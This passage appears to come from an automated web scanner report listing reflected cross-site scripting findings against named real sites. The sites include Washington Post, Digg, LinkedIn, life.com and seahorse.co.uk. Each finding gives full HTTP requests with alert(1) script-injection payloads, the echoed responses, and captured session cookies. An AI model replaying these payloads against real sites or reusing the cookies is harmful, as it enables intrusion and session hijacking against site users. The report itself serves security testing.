Referer: https://secure.customersvc.com/servlet/Show?WESPAGE=am/Services/load_email.jsp&MSRSMAG=TD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000G-qvzH7XlMCSC3HkDKeFsLI:BA3E76BBC63F85420000019800000002AC10CF22; BIGipServersecure_http=1128181770.20480.0000

WESSTATEPAGE=am%2FState%2FServices%2Fwes_email_load.txt&WESTRANSITION=TRUE&MSRSMAG=TDb18c2'%3b9cc60c9ea13&PUBLISHER=TI

Response

HTTP/1.1 200 Document follows
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html;charset=ISO-8859-1
Last-Modified: Wed, 05 Oct 2011 14:57:48 GMT
Expires: 0
Content-Language: en-US
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Date: Wed, 05 Oct 2011 14:57:49 GMT
Server: WebSphere Application Server/7.0
Content-Length: 94780


<html>
<!-- Template Header //-->


<head>


<title>


    Magazine Customer Services


</title>


<meta http-equiv="Content-Type"
...[SNIP]...
<script type="text/javascript">
   var chMagCheck = 'TDB18C2';9CC60C9EA13';
   if(chMagCheck == "CH")
       { window.location = '/wes/servlet/Show?WESPAGE=am/Services/wes_email_CH.jsp&MENULINK=CONTACT&MSRSMAG=CH'; }
</script>
...[SNIP]...

2.54. http://weather-rest.washingtonpost.com/rest/conditions/20001j [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather-rest.washingtonpost.com
Path:   /rest/conditions/20001j

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload bfe78<script>alert(1)</script>566f067ef66 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/conditions/20001j?jsonp=YUI.Env.JSONP.yui_3_3_0_7_1317825045655135bfe78<script>alert(1)</script>566f067ef66 HTTP/1.1
Host: weather-rest.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.washingtonpost.com/politics/campaigns/texas-gov-rick-perry-posts-big-fundraising-haul-in-first-months-in-gop-race/2011/10/05/gIQA1LqINL_story.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1317825106|session#1317825045691-448319#1317826906|odglobal#0#1319034646|odarticle_top#0#1319034646; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:33:13 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Content-Length: 1288
Content-Type: text/json

YUI.Env.JSONP.yui_3_3_0_7_1317825045655135bfe78<script>alert(1)</script>566f067ef66({"conditions":{"meta":{"desc":"Conditions RESTFul service READ call via JSON","version":"2.1.0","input-zip":"20001","input-city":"Washington","input-state":"DC","response-code":100,"response":"The con
...[SNIP]...

2.55. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 11546<script>alert(1)</script>83632e3a6ca was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//thepage.time.com/2011/10/05/moneyball/%3Fiid%3Dsl-article-thepage11546<script>alert(1)</script>83632e3a6ca HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thepage.time.com/2011/10/05/moneyball/?iid=sl-article-thepage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=d3afdeade10030459921e51ee27a79b6d31995d57b2768ffe39a9b8d07d16cbd; __utma=146621099.1594037511.1316307248.1316307248.1316307248.1; __utmz=146621099.1316307248.1.1.utmcsr=kuza55.blogspot.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=146621099.|2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 05 Oct 2011 14:30:43 GMT
Via: NS-CACHE: 100
ETag: "KXKDMGAKPNSYVUPKOU"
Content-Length: 153
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Wed, 05 Oct 2011 14:40:42 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://thepage.time.com/2011/10/05/moneyball/?iid=sl-article-thepage11546<script>alert(1)</script>83632e3a6ca", "diggs": 0});

2.56. http://wpni.tt.omtrdc.net/m2/wpni/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wpni.tt.omtrdc.net
Path:   /m2/wpni/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload fd44d<script>alert(1)</script>286805e1ef was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/wpni/mbox/standard?mboxHost=www.washingtonpost.com&mboxSession=1317825045691-448319&mboxPage=1317825045691-448319&mboxCount=1&section=politics%2Fcampaigns&loggedin=false&mbox=wp_article_topfd44d<script>alert(1)</script>286805e1ef&mboxId=0&mboxTime=1317807045971&mboxURL=http%3A%2F%2Fwww.washingtonpost.com%2Fpolitics%2Fcampaigns%2Ftexas-gov-rick-perry-posts-big-fundraising-haul-in-first-months-in-gop-race%2F2011%2F10%2F05%2FgIQA1LqINL_story.html&mboxReferrer=http%3A%2F%2Fthepage.time.com%2F2011%2F10%2F05%2Fmoneyball%2F%3Fiid%3Dsl-article-thepage&mboxVersion=38 HTTP/1.1
Host: wpni.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.washingtonpost.com/politics/campaigns/texas-gov-rick-perry-posts-big-fundraising-haul-in-first-months-in-gop-race/2011/10/05/gIQA1LqINL_story.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Wed, 05 Oct 2011 14:33:24 GMT
Server: Test & Target

mboxFactories.get('default').get('wp_article_topfd44d<script>alert(1)</script>286805e1ef',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317825045691-448319.19");

2.57. http://www.life.com/standalone/ad-frame.php [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.life.com
Path:   /standalone/ad-frame.php

Issue detail

The value of the pos request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ab5f1%3balert(1)//eef80b142d7 was submitted in the pos parameter. This input was echoed as ab5f1;alert(1)//eef80b142d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /standalone/ad-frame.php?size=300x250&tileCounter=1&pos=0ab5f1%3balert(1)//eef80b142d7 HTTP/1.1
Host: www.life.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.life.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vnum_d=1317877200324%26vn%3D1; sinvisit_d=true; s_vnum_w=1318136400326%26vn%3D1; sinvisit_w=true; s_vnum_m=1320123600327%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 05 Oct 2011 15:03:02 GMT
ntCoent-Length: 3245
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 3245
Date: Wed, 05 Oct 2011 14:52:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></tit
...[SNIP]...
else {
           adFactory.setParam('slide', 0);
       }

   } else {
       adFactory.setParam('slide', parent.timelineController.currentImageIndex);
   }
}

adFactory.setParam('!c', 'expandables');
var pos = 0ab5f1;alert(1)//eef80b142d7;
if (pos !== 0) {
   adFactory.setParam('pos', pos);
}
</script>
...[SNIP]...

2.58. http://www.life.com/standalone/ad-frame.php [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.life.com
Path:   /standalone/ad-frame.php

Issue detail

The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7894"><script>alert(1)</script>14d23470de1 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /standalone/ad-frame.php?size=300x250a7894"><script>alert(1)</script>14d23470de1&tileCounter=1&pos=0 HTTP/1.1
Host: www.life.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.life.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vnum_d=1317877200324%26vn%3D1; sinvisit_d=true; s_vnum_w=1318136400326%26vn%3D1; sinvisit_w=true; s_vnum_m=1320123600327%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 05 Oct 2011 15:03:08 GMT
ntCoent-Length: 3259
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 3259
Date: Wed, 05 Oct 2011 14:52:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></tit
...[SNIP]...
<div class="advertisement300x250a7894"><script>alert(1)</script>14d23470de1" align="center">
...[SNIP]...

2.59. http://www.life.com/standalone/ad-frame.php [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.life.com
Path:   /standalone/ad-frame.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9498"%3balert(1)//122e120ff8e was submitted in the size parameter. This input was echoed as f9498";alert(1)//122e120ff8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /standalone/ad-frame.php?size=300x250f9498"%3balert(1)//122e120ff8e&tileCounter=1&pos=0 HTTP/1.1
Host: www.life.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.life.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vnum_d=1317877200324%26vn%3D1; sinvisit_d=true; s_vnum_w=1318136400326%26vn%3D1; sinvisit_w=true; s_vnum_m=1320123600327%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 05 Oct 2011 15:03:03 GMT
ntCoent-Length: 3229
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 3229
Date: Wed, 05 Oct 2011 14:52:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></tit
...[SNIP]...
<script type="text/javascript">
var sizes = new Array("300x250f9498";alert(1)//122e120ff8e");
var adMulti = adFactory.getMultiAd(sizes);
adMulti.write();
</script>
...[SNIP]...

2.60. http://www.life.com/standalone/ad-frame.php [tileCounter parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.life.com
Path:   /standalone/ad-frame.php

Issue detail

The value of the tileCounter request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6278c%3balert(1)//196b60afd15 was submitted in the tileCounter parameter. This input was echoed as 6278c;alert(1)//196b60afd15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /standalone/ad-frame.php?size=300x250&tileCounter=16278c%3balert(1)//196b60afd15&pos=0 HTTP/1.1
Host: www.life.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.life.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vnum_d=1317877200324%26vn%3D1; sinvisit_d=true; s_vnum_w=1318136400326%26vn%3D1; sinvisit_w=true; s_vnum_m=1320123600327%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 05 Oct 2011 15:03:03 GMT
ntCoent-Length: 3245
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 3245
Date: Wed, 05 Oct 2011 14:52:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></tit
...[SNIP]...
<script type="text/javascript">
var adConfig = new TiiAdConfig("3475.life");
adConfig.setCmSitename("cm.life");
adConfig.setRevSciTracking(true);

var adFactory = null;
var tileCounter = 16278c;alert(1)//196b60afd15;
var inDapIF=true;

if (parent && parent.adFactory) {
var parentAd = parent.adFactory; // instantiate new adFactory object, based on parent adFactory object
var
...[SNIP]...

2.61. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 38e7b<img%20src%3da%20onerror%3dalert(1)>ccc87e92bc4 was submitted in the url parameter. This input was echoed as 38e7b<img src=a onerror=alert(1)>ccc87e92bc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.aljazeera.com%2Fmobile%2F38e7b<img%20src%3da%20onerror%3dalert(1)>ccc87e92bc4 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://english.aljazeera.net/mobile/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; __utma=23068709.137718761.1317490314.1317490314.1317490314.1; __utmz=23068709.1317490314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=23068709.guest; __qca=P0-1723008341-1317490314170; visit=M

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:35:07 GMT
Content-Length: 128

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.aljazeera.com\/mobile\/38e7b<img src=a onerror=alert(1)>ccc87e92bc4"});

2.62. http://www.seahorse.co.uk/shop/products/back_issues.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seahorse.co.uk
Path:   /shop/products/back_issues.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c155<script>alert(1)</script>aa38bc80652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/products/back_issues.php?year=/2c155<script>alert(1)</script>aa38bc806522004 HTTP/1.1
Host: www.seahorse.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.seahorse.co.uk/shop/products/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ddf23a5a013023e46d03fc085c7099e

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:54 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.4
Content-Type: text/html
Content-Length: 3410

<!-- header starts here -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Seahorse International Sailing Magazine</title>

...[SNIP]...
<td class=subhead align='center'>Seahorse /2c155<script>alert(1)</script>aa38bc806522004</td>
...[SNIP]...

2.63. http://www.seahorse.co.uk/shop/products/back_issues.php [year parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seahorse.co.uk
Path:   /shop/products/back_issues.php

Issue detail

The value of the year request parameter is copied into the HTML document as plain text between tags. The payload 98d3c<script>alert(1)</script>c627511222f was submitted in the year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/products/back_issues.php?year=200498d3c<script>alert(1)</script>c627511222f HTTP/1.1
Host: www.seahorse.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.seahorse.co.uk/shop/products/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ddf23a5a013023e46d03fc085c7099e

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:48 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.4
Content-Type: text/html
Content-Length: 3409

<!-- header starts here -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Seahorse International Sailing Magazine</title>

...[SNIP]...
<td class=subhead align='center'>Seahorse 200498d3c<script>alert(1)</script>c627511222f</td>
...[SNIP]...

2.64. http://www.seahorse.co.uk/shop/products/show_cart.php [new parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seahorse.co.uk
Path:   /shop/products/show_cart.php

Issue detail

The value of the new request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2f1"><script>alert(1)</script>9c9cf0df856 was submitted in the new parameter. This input was echoed as 1f2f1\"><script>alert(1)</script>9c9cf0df856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/products/show_cart.php?new=B921f2f1"><script>alert(1)</script>9c9cf0df856&add=Add+to+Basket HTTP/1.1
Host: www.seahorse.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.seahorse.co.uk/shop/products/back_issues.php?year=2004
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ddf23a5a013023e46d03fc085c7099e

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:51 GMT
Server: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.4.4 with Suhosin-Patch FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 5584

<!-- header starts here -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Seahorse International Sailing Magazine</title>

...[SNIP]...
<input type = text class='formBox' name = "B921f2f1\"><script>alert(1)</script>9c9cf0df856" value = 1 size = 3>
...[SNIP]...

2.65. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload b9e8f<script>alert(1)</script>048c06dc6d0 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282b9e8f<script>alert(1)</script>048c06dc6d0; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=8&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:56 2011&96a74<script>alert(1)</script>9da2ecf03fe=&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27490

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
&arc=6108751&', "ar_p119936314fa24ecc816ce37421b89f501": 'exp=1&initExp=Wed Oct 5 14:34:43 2011&recExp=Wed Oct 5 14:34:43 2011&prad=71054949&arc=43921375&', "UID": '9cc29993-80.67.74.150-1314836282b9e8f<script>alert(1)</script>048c06dc6d0', "ar_fa24ecc87a8074b4bb32843e": 'exp=1&initExp=Wed Oct 5 14:34:42 2011&recExp=Wed Oct 5 14:34:42 2011&prad=71054949&arc=43921375&', "BMX_3PC": '1', "UIDR": '1317753620', "ar_p81479006": 'exp=1&
...[SNIP]...

2.66. http://ar.voicefive.com/bmx3/broker.pli [UIDR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UIDR cookie is copied into the HTML document as plain text between tags. The payload 9f087<script>alert(1)</script>ea56a26f3e5 was submitted in the UIDR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
